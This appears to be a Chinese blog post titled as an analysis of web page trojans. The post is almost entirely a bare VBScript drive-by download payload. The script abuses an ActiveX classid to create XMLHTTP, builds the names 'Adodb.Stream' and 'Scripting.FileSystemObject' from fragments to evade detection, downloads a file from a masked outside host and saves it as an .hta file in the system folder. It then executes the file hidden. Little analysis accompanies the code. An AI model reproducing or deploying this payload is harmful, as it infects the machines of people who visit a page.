网页挂马解析

<script language="VBScript">
 
on error resume next
 
' due to how ajax works, the file MUST be within the same local domain
dl = "http://www.***.com/other/source.htm"
 
' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
 
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
 
' xml ajax req
str6="GET"
x.Open str6, dl, False
x.Send
 
' Get temp directory and create our destination name
fname1="setHomepage.hta"
a1="S"
a2="cripting."
a3="Fil"
a4="eSy"
a5="stemO"
a6="bject"
str1=a1&a2&a3&a4&a5&a6
str5=str1
set F = df.createobject(str5,"")
set tmp = F.GetSpecialFolder(0) ' Get tmp folder
document.write(tmp)
fname1= F.BuildPath(tmp,fname1)
S.open
' open adodb stream and write contents of request to file
' like vbs dl+exec code
S.write x.responseBody
' Saves it with CreateOverwrite flag
S.savetofile fname1,2
 
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
 
</script>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值